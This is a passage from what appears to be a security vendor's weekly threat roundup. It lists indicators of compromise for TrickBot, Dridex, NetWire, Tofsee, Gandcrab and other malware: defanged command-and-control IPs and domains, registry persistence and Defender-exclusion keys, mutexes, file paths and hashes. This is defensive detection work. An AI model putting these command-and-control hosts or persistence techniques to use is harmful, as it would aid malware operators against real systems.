\n`miyataseika[.]sakura[.]ne[.]jp` | 1 \n`mail[.]uberved[.]com` | 1 \n`mail[.]victoriasuitehotel[.]com[.]pe` | 1 \n`pop3[.]jinrikiudon[.]co[.]jp` | 1 \n`pop[.]e-apamanshop[.]com` | 1 \n`bh-35[.]webhostbox[.]net` | 1 \n`pop[.]orange[.]jo` | 1 \n`mail[.]muzamilglass[.]com` | 1 \n`mail[.]aceinterioruae[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\576.exe` | 10 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 2 \n \n#### File 
Hashes\n\n` 24547a6e7ab9766fc85644033e27414deb2409367fae21fdb722174a605a34ad 27e0a7b8c18893b22583e19ef7634fd79fc9cb5daed862f794960ddaa19b58dc 363ecad264cfe3cdef52119a1b78c495d362efa7df5d38d182ce76dbf31facfd 3f0e86777e4a9b3285a9203907f5a7e6f804e7cfda3300b857e8712ac2030e57 5e31045309ab5ecbef3701c9023fc5a4631bf653347447484b652e434b086966 67c3eabb23b74c1a6ee4d384fa6f248c4a2492d998e7aaf0a1ce3f878a8ff715 6ba2589b00a95ff4ce9f7eee550bdffa6ef57dbf0212384ce38696b0c13778bd 7b0c9b63d9e8c6399e13354176e41bde009c94053b0566ef4506b17c14b46ab7 9100a8c4f2f6dd2bde134162d6b70f0d9ac99db4ff1f4551407a8a078ce2c35c c0197a5e801dee8d80df024c32a616c04539a56108b2225b469c7eb5fede5447 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-mpa4EVqp_ns/Xf0C_5O5QnI/AAAAAAAADCI/Bnenu7XaNyU-j8xahDBEzyTDl50QgcHbwCLcBGAsYHQ/s1600/3f0e86777e4a9b3285a9203907f5a7e6f804e7cfda3300b857e8712ac2030e57_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NEG67E4Mz5M/Xf0DNc4qPJI/AAAAAAAADCM/hX-ZTiN4bBY_i3bX_XvJivgsaNjuLJ49wCLcBGAsYHQ/s1600/6ba2589b00a95ff4ce9f7eee550bdffa6ef57dbf0212384ce38696b0c13778bd_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-1rcSJ0oxfYw/Xf0Dzt07JpI/AAAAAAAADCc/R_EgDjOn-lcZtSz1cZRJG_Gq-qKag71vwCLcBGAsYHQ/s1600/9100a8c4f2f6dd2bde134162d6b70f0d9ac99db4ff1f4551407a8a078ce2c35c_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-a3Axop96p_k/Xf0D4SmDspI/AAAAAAAADCg/iMDtVAuX5XYmBsPHmwtqYj1ziOrT8Z3QgCLcBGAsYHQ/s1600/67c3eabb23b74c1a6ee4d384fa6f248c4a2492d998e7aaf0a1ce3f878a8ff715_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.TrickBot-7455405-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- 
\n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`167[.]86[.]123[.]83` | 4 \n`5[.]34[.]177[.]50` | 4 \n`193[.]37[.]213[.]110` | 4 \n`170[.]84[.]78[.]224` | 3 \n`216[.]239[.]36[.]21` | 2 \n`216[.]239[.]38[.]21` | 2 \n`117[.]196[.]233[.]79` | 2 \n`85[.]143[.]220[.]41` | 2 \n`5[.]2[.]72[.]84` | 2 \n`146[.]185[.]219[.]94` | 2 \n`185[.]62[.]189[.]132` | 2 \n`107[.]172[.]29[.]108` | 2 \n`3[.]224[.]145[.]145` | 1 \n`200[.]21[.]51[.]38` | 1 \n`31[.]214[.]138[.]207` | 1 \n`181[.]129[.]104[.]139` | 1 \n`190[.]142[.]200[.]108` | 1 \n`181[.]113[.]28[.]146` | 1 \n`177[.]105[.]242[.]229` | 1 \n`185[.]66[.]13[.]65` | 1 \n`212[.]124[.]117[.]25` | 1 \n`64[.]44[.]133[.]151` | 1 \n`107[.]172[.]208[.]51` | 1 \n`146[.]185[.]253[.]132` | 1 \n`172[.]82[.]152[.]130` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 2 \n`myexternalip[.]com` | 2 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`api[.]ipify[.]org` | 1 \n`ipinfo[.]io` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\System Network Extensions` | 20 \n`%APPDATA%\\speedlink` | 20 \n`%APPDATA%\\speedlink\\data` | 20 \n`%APPDATA%\\speedlink\\settings.ini` | 20 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 20 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 20 \n`%APPDATA%\\SPEEDLINK\\<original file name>.exe` | 20 \n \n#### File Hashes\n\n` 14c4ecbdba8a97d3157dcbbe5be3ab9270ba9142e6ea6286634e8b9658db5f20 170f8b900b31d3bcdf5e97d870a4b791c7e28754b15b7c90c4e835c2f7d579b7 22c10541cffa8a6c504202fe909fdbaa87375427fb2918ac1ab78a0656a886f0 26c501cea49207f9482fa293ed361c2bb4c163ed6c0a8cf309aa21624570f0ba 2c5c0a1b1998c1686eb2cc6654681aa933eb123feb972110cb2ddd91ab188429 3247f44c8c5bd8707c2a78e71ae03cc4a98845e1af8f7e283ea0189bf2c578bf 7d97d4c51ba4ad8a562264a9a0f8a09165123eeab47b74370f116778e9507cdf 95ee0f3243a2202f706bd45aaa2d27614059773ecb978671324560dc87fa6c03 9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5 9f8aeec6db5f0220c88f6b90777c17f52a0219a5581cd586931782a975d1e068 ae560bec5699185818aa31178b20782fdb5113c202ac29ac9e6e26a4a2ccc091 bbab2020a80bf96b5784d94a395f9239127389e114799d3de605e0a13f0a7f91 c93ab8787073bbbc9cd37a121fa63b1eb782f547ed3a2085c0b09ca3a7549dee d635e095a8694027c0523c7b0ec13409daa295afb99eb40395a3794a948479a5 d7e9dd938f44a2be9163002868973d34bb445ffd008bc007493ee271661fc691 de4ff1ec4bdd8662185ab8776e9ca1a898a402d7c794b8b6f7d4b481a56e3a2b e282e081f44f468e9f12421833b9db629f788b583cc050bf945cb3067be916ae eaab484d0f2cfa0ba4e2ffe301f08e5a2f515195131f023bd8d69b8acafd5bb4 f1265e6373975143d1b68cc5ddde073a615531133a43cc789b425e3d318bd159 f979b407999143cd0d22e46cca3405a14dd0ddb6d022c79aa0f399c7a0b1db9f `\n\n#### Coverage\n\nProduct | 
Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-xHZr1vHxCa0/Xf0EIRPg2YI/AAAAAAAADCs/SNyaOhLXyOUtTbJPmz36uZPCj5QJGQQFgCLcBGAsYHQ/s1600/9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-RnOUJi4vVao/Xf0ENJ9wspI/AAAAAAAADCw/dBOVQQK_bPsU24tiRiB45k7jhOi0vJi2gCLcBGAsYHQ/s1600/9b71918c0db320b9b7ae6501f7b898082678480825b24d6c863bc1c017291db5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Dridex-7447905-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 16 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 16 \nMutexes | Occurrences \n---|--- \n`2XzfQtwuWo` | 2 \n`6K6du14uPy` | 2 \n`Pl97gmRo4e` | 2 \n`Rn0BgZV5LS` | 2 \n`VdM3QqPmEf` | 2 \n`dfSE5V35Cq` | 2 \n`h7l6vKPM9o` | 2 \n`qlxcdn1ONT` | 2 \n`8Uxj8bcq52` | 1 \n`YCQp73aCwI` | 1 \n`A9GTS5Q4V7` | 1 \n`hMRRcbdYM5` | 1 \n`Oa0iwlf5sY` | 1 \n`ogQ7oifBn6` | 1 \n`jZKilZdPlc` | 1 \n`qBGGGgXckD` | 1 \n`l4ibeg830v` | 1 \n`wOMqV2KpkO` | 1 \n`7blYqMoYMu` | 1 \n`3YLHr362i4` | 1 \n`E2Z6XqeW5y` | 1 \n`SUFSEHTYOK` | 1 \n`Jm43Qhf6mW` | 1 \n`SbwW51fbso` | 1 \n`OM3OWBjT4C` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]10[.]238` | 16 \n`104[.]20[.]68[.]143` | 12 \n`104[.]20[.]67[.]143` | 4 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 16 \n`www[.]riirnqa3el[.]com` | 2 \n`www[.]tcofbii6gc[.]com` | 2 \n`www[.]xkwkb7vwyc[.]com` | 2 \n`www[.]luzbvsguu7[.]com` | 2 \n`www[.]e2vqnpqnxa[.]com` | 2 \n`www[.]ddwnd8uazb[.]com` | 2 \n`www[.]yg1ihyzjlx[.]com` | 2 \n`www[.]k3okzy7fbv[.]com` | 2 \n`www[.]5rmqghqote[.]com` | 1 \n`www[.]sbbvxwzjds[.]com` | 1 \n`www[.]lfrmipbwhf[.]com` | 1 \n`www[.]5tmjtihjrd[.]com` | 1 \n`www[.]99z7gq8bpa[.]com` | 1 \n`www[.]fn8bcbak8g[.]com` | 1 \n`www[.]j3hh3nvc1x[.]com` | 1 \n`www[.]q6rbctmtup[.]com` | 1 \n`www[.]6y1kayw2zo[.]com` | 1 \n`www[.]cngy66afzf[.]com` | 1 \n`www[.]xwra4vfpbm[.]com` | 1 \n`www[.]xp9isgvq38[.]com` | 1 \n`www[.]3upvufuqla[.]com` | 1 \n`www[.]phtetocd0l[.]com` | 1 \n`www[.]6komu134jz[.]com` | 1 \n`www[.]cmckmtegzm[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`<malware cwd>\\old_<malware exe name> (copy)` | 13 \n \n#### File Hashes\n\n` 01568fc89054049b9f4c65271186513fa9406e5bcaddd2583fa55abea453f3aa 0a07af4ec8798650f1e578f7e48df97980cf18074d2cc8b17955bb129c44607e 2440f0be01bed503a0a4315e8f253d6559063c7dd3dfd7e28379b23cc9fe3929 25effe96a8c27444dac8ff4ff13f75bc56c351faa74ddd0b217bf6c5f8202cbc 282c63152fdf124cba6c392874c96e670ce019b8566c1cba18475701ce06fbac 4d7589c590b5b0e69c5f08c7664bf658fe340b47022299337e9ec0ccf604426e 6b0ab0fb5437d31cef43d3b0cb989832b3d42d4d1c115d2180ffa0e25d6e0be3 6fcbcc1c24bf20ea3dfff5bfad8d0c38e60e46d1c9cbf254d845c58d4cecd1c9 878fd0aa3f953d35e89d4cf6b52183aa3cc0a1ab244665a4262189c065ce04ce 87dabcb18d67440cf631479d6ae1bacb32d82704c3c54e0305c370cd3f122512 a51d3150053e1a9d2176e98f0000acb572ecbe7c33ae596ab9cdfd4a05470b8c a71838cb33ea89f9e3f3201825b7129b8a61f112d946bf9b7671f2af901a07c1 ac29341c883ff743a3213050314bcfe0abffa366fec2abc09434d789bf836bcd b82c549b351a01839d6e3cc9ca60f1aaed2478799f373bcae604b6ede0e0c4e6 bb819890507c80a1cf9e83808d451a00fdae2fb43b1881b3806093bba32c1a8a 
f8b9bbc15f8697772d577944686a9b9c61547b992d156d0901293b438f359306 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-P-SobapiwkE/Xf0EcT31AQI/AAAAAAAADC4/7ez78ZjpDCgq3ACSop55BgdpiBGl6M3XACLcBGAsYHQ/s1600/01568fc89054049b9f4c65271186513fa9406e5bcaddd2583fa55abea453f3aa_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-lcorVe4U7AE/Xf0EhZzbtDI/AAAAAAAADDA/HZ2iExAqrbwrFY6J1GQ0BHb3gsqP2EGFwCLcBGAsYHQ/s1600/4d7589c590b5b0e69c5f08c7664bf658fe340b47022299337e9ec0ccf604426e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7450491-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: None ` | 10 \nMutexes | Occurrences \n---|--- \n`frenchy_shellcode_006` | 10 \n`Global\\{259ce387-0d2a-4287-8147-d7e9dfdbdca4}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`79[.]134[.]225[.]121` | 10 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`jogodo[.]duckdns[.]org` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 10 \n`%APPDATA%\\None` | 10 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\catalog.dat` | 4 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\settings.bin` | 4 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\storage.dat` | 4 \n \n#### File Hashes\n\n` 06b47808b96d08f6ef2089ff0d8eed4a9d448d5e6ebc4fe86321cfaecb774bc0 0815f50eb9877530cdcc6a30e551772d0c4807e2105e7cc5ecd3b510d7d3a019 0950e389cce1b3be7140f1a9ba2ddd6a677fda7fb50020bfc15d80b9aac8ccec 7e0c1895e8a080c7db4faca83b354d5af326920ce4534658e0c947f61328b468 a3bcf7816ef93cacc688c6b7bebac3b46d6826c85cfd215d5da279af11e509ae cf37f002c857a43c1d45189a68368ed643dc506c0260f4fe436d12e4e2b2d22d d2cf31b477c11ba5cb39a341fc7bedddbf1a7ec9541b105bab8e0022849a88c9 dc0714b70cb172c05ccb08424163e8932add81a498b55a556feb706cb80ffc13 f2d9a6acc6b09b4027dc558a268036a1213deecefae9952670bff42a481daaba f8a661f4823d529c13c7e2698f67aa3a00ed9a27f59e810b75cb4ead41dc3cf2 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-C5bOmi6wuVI/Xf0E0pMusxI/AAAAAAAADDM/DgO-Y8Tnpjo5x_73EK3qvEZL5Z0wzB0CACLcBGAsYHQ/s1600/f2d9a6acc6b09b4027dc558a268036a1213deecefae9952670bff42a481daaba_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-QWprkvx3V80/Xf0E6tbbHaI/AAAAAAAADDQ/JGaRh_LZzNEwhA65VYx2SQNNnSZiYop7ACLcBGAsYHQ/s1600/06b47808b96d08f6ef2089ff0d8eed4a9d448d5e6ebc4fe86321cfaecb774bc0_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.NetWire-7454096-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Registry Key Name ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\ENUM\\SW\\\\ASYNCMAC \nValue Name: CustomPropertyHwIdKey ` | 1 \nMutexes | Occurrences \n---|--- \n`-` | 25 \n`KYIMEShareCachedData.MutexObject.Administrator` | 8 \n`KYTransactionServer.MutexObject.Administrator` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`85[.]206[.]175[.]225` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\~$BOSCH.xlsx` | 25 \n`%TEMP%\\Install\\Settings.ini` | 25 \n`%TEMP%\\BOSCH.xlsx` | 25 \n`%TEMP%\\Install` | 25 \n`%TEMP%\\Install\\EXCEL.exe` | 25 \n`%TEMP%\\Install\\EXCEL.vbs` | 25 \n \n#### File Hashes\n\n` 04e12a8dcf9e8f041cf1b5b7f8f48a832df5fd607bf810fb28933fbc188a8c4b 0d9bedadc3e9edbc3b84c20a651d1e0a23609e4a7f039ec36c67276e90eed205 13047457fd3aca8c5d0ce5f165ea513cbdcd128a4e0de5b7322b895e1188f680 13a210e2e5527d08b6018f2463056f1d31011ed10e696b26e10482a4b09045f6 1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92 23804d31eb2d20e90df50559281008425b584a77fad856dce360400292bc6a80 291b26c6629d51d69e7856d22f80202b7a97f0a0f364adab27f16006e77d2df2 2e8e1ad0e72ecfc4cef418a8bc25095c4b0893a561c446a6aa1b8fe56c780d8c 36115f2ed9027f14643f000815ec615d44b97e3fb5c14cc0b67fcb9e784d3bda 3ad37750ccdb9ce0a82997c591d7842d9cee5722fc03219d0cf51f6cf7ddcc00 541e9bb6c2ff220ba15fd731000327f54ca8eae9e3df4d3e4193f50bf4f5f63b 5bf1aead7b5e89d92227d0e1daa019c0927de54faad212c35775d79f1c7b5d39 
5f738f026c6f20f0d7ea5808ce96f14dbcb21f47b7b98d60e577a09d43d69071 6626bc4952d2a8cf839a47a4ada71ae877b7b89ac230821d9f5f17462eef4f4c 68252e2eb44e02032d53c42fe4b4c3ed6b8773f60aa78ebb7e6d34ee51ad32bc 68aaa21c0a7e40ba3bbc90abd3d9dd259d6c21d354d219b91ccd61e5c3b52089 68fe9505234da0d57d8a6c4898a1948574698fd5d5ddd9222efad0018d3adf3c 6fca62b51ce59dbf722f5f7d242f26c09b7b02cebde3d9b8db7feacc9d76da1a 7697945d1d3d95f66f3337329d8142f709fd153ead6ac8adfce7975b8572ad04 79a505ca4c4497351ee7cdd599212bf22979421f1055527bc11797d49b8ab907 7a291dffa29a8ca2f094af686ba0c8ceff4d432d10e601273f8b9a8779899e48 88edc5c751377aaf23028562d4a979ff2ca95b61d3d128fa42b64e68e42e20b2 895c0c05ba64cbf70bc8a9587194497b3c93f53cb9e17edcaf7d506a1f58b195 8bd10e751e7df59c1ba91a71bbeadbe5dfa12cb75d0fc7fdf65007703745e31c 8f7abac012c0016d87e3f40e14cdae185193aa8a6bfcb3810c010eab9ec495c6 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-YyGR5PJVZXo/Xf0FJ8VcFpI/AAAAAAAADDY/w2Z2J2WIBZo3z1vS43H9ZzETytYgNmzDwCLcBGAsYHQ/s1600/1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-uWi5I8oOgg8/Xf0FOc-g3NI/AAAAAAAADDg/p5h-4gAhZb0XtO0GrDRVrdLf8If2Gg72gCLcBGAsYHQ/s1600/1e4e92c1d2b131e7710726282a014c014089a61bf93f7bd27b0689e4faef0d92_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Tofsee-7450732-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching 
'[A-Z0-9]{8}'> \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config4 ` | 8 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\gzntsagv ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` 
| 1

IP Addresses contacted by malware (does not indicate maliciousness), Domain Names contacted by malware (does not indicate maliciousness), Files and or directories created: *See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-7MSI84-8D-s/Xf0FfRx_qKI/AAAAAAAADDs/P3bx3KcYrKASbJ8u91VCygre0pbv-IWkwCLcBGAsYHQ/s1600/60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-I9v-Uc_HX0w/Xf0FjyXzbUI/AAAAAAAADDw/mBZ3-3X3frcKfDG4a4NPv_sacbSu27aygCLcBGAsYHQ/s1600/60d0cdba9b81f58e4f926e1bbe357d7415771f42819acb79fa4d02313fdac8b9_tg.png>)

#### Umbrella

[Umbrella detection screenshot](<https://1.bp.blogspot.com/-eFo5vK1_c60/Xf0Fo4MLP5I/AAAAAAAADD0/QpWgifGLyoctq2UaFlmqvSeIoijRryWiQCLcBGAsYHQ/s1600/a76e2be2b3730324299bd32c7da5a04f494f79a69aeab9649aa53984c852e49a_umbrella.png>)

* * *

### Doc.Downloader.Sagent-7454309-0

#### Indicators of Compromise

Registry Keys, Mutexes, IP Addresses contacted by malware (does not indicate maliciousness), Domain Names contacted by malware (does not indicate maliciousness), Files and or directories created: *See JSON for more IOCs
#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-sOfzBR2RcLs/Xf0GFO2qaTI/AAAAAAAADEE/4tvJstRSx4sB2bMIpTujkvu0ZW5dVPRJQCLcBGAsYHQ/s1600/e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-FVtOXQoimEA/Xf0GJx72BkI/AAAAAAAADEI/TCXd3CRSo-woM6thdkimZ-72l4c0xh3HQCLcBGAsYHQ/s1600/d4b9a89ae01db11a9adf508ed1777327145eb205404a1df5020919c19068d4e0_tg.png>)

#### Umbrella

[Umbrella detection screenshot](<https://1.bp.blogspot.com/-ajOIztn97Ug/Xf0GP0kDCtI/AAAAAAAADEM/FU_HSIrmu8YJ7arCQncWhst1u9d72eICgCLcBGAsYHQ/s1600/1bf23d80114b94336235bc3b83960f4bcecd4478effa98b92536c1e907bb70b8_umbrella.png>)

#### Malware

[Malware screenshot](<https://1.bp.blogspot.com/--fW-Vz116hE/Xf0GUGd93vI/AAAAAAAADEQ/aTLPYJ7Rw54aKbsJA_hvmM2ZQC2jmK5dACLcBGAsYHQ/s1600/e80c5f3eeb9d4cea62abe90a95e27b1c04ee7b02bf021e11cf9da956485c0bea_malware.png>)

* * *

### Win.Malware.Gandcrab-7454521-1

#### Indicators of Compromise

Registry Keys, Mutexes, IP Addresses contacted by malware (does not indicate maliciousness), Domain Names contacted by malware (does not indicate maliciousness), Files and or directories created: *See JSON for more IOCs
#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](<https://1.bp.blogspot.com/-EqM5h1pjJHw/Xf0GzaDIFDI/AAAAAAAADEg/vsToWCMYlgA2x6545gawfH4VRjtFtrlvgCLcBGAsYHQ/s1600/318cff626b73c4508e9860b2d9ad8a5b53f93637a9a4b9b21cec27c0dde10dcf_amp.png>)

#### ThreatGrid

[ThreatGrid detection screenshot](<https://1.bp.blogspot.com/-pAIKH3uRpx0/Xf0G3NA_exI/AAAAAAAADEk/Lz5VGq8eQtU44jwFyHU8l2h8LbQrbAvwACLcBGAsYHQ/s1600/f7d7c3c2f18131b432af6b8cfa03bebbbce9e1fe914cef79f4464ab4dda1baad_tg.png>)

#### Umbrella

